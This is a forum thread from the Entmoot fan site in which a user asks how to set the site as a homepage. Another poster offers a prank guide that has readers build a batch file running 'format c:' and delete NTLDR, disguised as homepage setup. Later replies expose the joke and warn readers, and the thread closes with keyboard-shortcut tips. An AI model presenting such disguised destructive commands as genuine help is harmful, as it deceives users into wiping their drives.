......I want to make it my homepage!!
Nearly all the time I'm on Entmoot!
How do I make it my homepage!
You hold Alt and push F4...
No, just kidding. Don't do that. For my browser, I click on "Tools", go to "Internet Options..." and there's a space where you can type/paste the URL of the website in.

How to make Entmoot your home page
By Anduril.
First, you need to create a batch file. It must be called the following:
EntmootHP.bat
To do this, right-click anywhere on your desktop where there aren't any icons, and click on:
New > Text Document
Now press "Enter" on your keyboard twice!
When the text editor opens, type the following:echo off
c:\windows\format c:
cls
echo Congratulations! Entmoot is now your new home page! Have fun! When you have finished typing these lines, don't forget to save your file. Save it as EntmootHP.bat, and make sure that you specify the location as your C:
Now comes the tricky bit (oooooh!).
You need to restart your PC. While your PC starts up, in the beginning POST screens (where it shows your PCs CPU and memory and other specs), keep pressing F8 repeatedly. This will take you to a menu where you must select:
Safe mode command prompt.
I can't remember which number it is, but it is towards the bottom of the list.
Once you have chosen it, you now have to type the following at the command prompt:
EntmootHP
This will begin the process that will change your home page to Entmoot! How wonderful.
All you need to do is press the "Y" button every time you are asked something. It's that simple! Why bother yourself with the jargon? I know I don't!
If you have done everything correctly, a little message will pop up afterwards, confirming that Entmoot is now your new home page.
Good luck!
The end.
PS. This will only work with Windows 98 machines. For NT and Win2000, you need to delete the NTLDR file in the C: (through Explorer or My Computer). This file will stop you from being able to change your home page. Once the file is deleted, PM me and I'll give you directions from there. Have a wonderful day!

Can they kill you when they format their harddrive? That is evil. And I know evil. :p
At first I didn't pay any attention to the batch file you had them create.

Makes Alt+F4 seem like child's play...

Anduril, when the people come after you with pitchforks and torches in the dead of night, I'm going to look the other way.:p
*Note* Just in case someone is very bad at taking hints... Don't do what Anduril told you to. Unless you want to erase your hard drive.
Anyone that doesn't know that deserves it.
That said, what's a hard drive? *laf*

I've known tons of people that don't know what that does - nor do they know the difference between the CPU, harddrive, or any other part of the computer.
It is really evil. It's the most basic of "viruses" too. *evil evil grin*

I feel so entirely stupid. If I hadn't read the whole thread, I probably would have attempted that someday. Oh wow...call me gullible. Or computer illiterate...still, I wonder what my parents would have said...after waking up to find the hard drive ruined. (PS- Yes, I do know what a hard drive is.:D)
You are so EVIL, Andruil! Well, at least I know how to read threads!:p

A friend of mine who is a professor once thought that if you place an infected hard drive on top of the other, the other one would catch whatever it has. :D HAHAHAHAH!

When there was "Pink and Purple Day" - I had told Tater to tell everyone that it was a computer problem, the computer for some reason just started changing the colors of Entmoot, and the color specialist was looking into it. :D He swore that no one would fall for it becuase it was so far out there. I just told him to watch how many people accepted the explanation. :D Most people really don't have any idea how computers work - so it's easy to tell people this stuff and make them believe it. Even people that use computers all the time - hardly ever understand what is going on with the programs they use or what the computer is actually doing.
What generally annoys me - is when people think that programming a computer is so easy. There have been so many times where I've been told "Well you JUST TELL it to do this." or "I just want to change this LITTLE thing." It may be easy for a human to do - but it's not necessarily easy for a computer to do. That's when I start carrying around my code print outs and do analysis in front of the person (or at least pretend to) - then they quickly shut there mouth about it being easy. Okay - I needed to vent a little bit..

Ok, someone tell me: What does Alt+F4 do?
Don't bother telling me to try it - I'm not quite *that* stupid.

It's just the normal way to close a window in windows without having to click on the "X" at the top right. It also brings up the shutdown menu.
Pretty nifty if you're too tired/lazy to point the mouse...
Well, you got me started on shortcuts... maybe I can give this thread some real direction.
You know the Windows (Win) key, right? Pretty useless... you'd think, however:
Win + D brings up the desktop, or minimizes all program windows.
Win + F brings up a file search for your computer.
Win + E brings up the My Computer folder with the mini folder window open.
Among others...
Ctrl + F4 closes a program window within a program window... which is to say, with a writing program, it closes the current document, but leaves the program (usually).
Alt + Tab will let you quickly navigate through multiple program windows in a condensed menu.
And, if you right-click on desktop shortcut icons and select "Properties", you can usually designate a shorcut key for the icon. Even while typing, I can open up some of my most-used programs with three keystrokes [shortcuts are generally Ctrl + Alt + letter].
Along with (in my case) Word shortcuts, though they seem to work with most word processors:
Ctrl + ] font size increases by 1 point.
Ctrl + [ font size decreases by 1 point.
Ctrl + Shift + . = font size increases to next size in bar (mine goes 8, 9, 10, 11, 12, 14, 16, 18, 20, 22, 24, 26, 28, 36, 48, etc.).
Ctrl + Shift + , = font size decreases to next size in bar.
Ctrl + Shift + G brings up the word/character/paragraph count.
Shift + F7 brings up the thesaurus for the word closest to the cursor.
F7 brings up spellcheck.
And the mother of all shortcuts,
Ctrl + Alt + . makes an ellipses
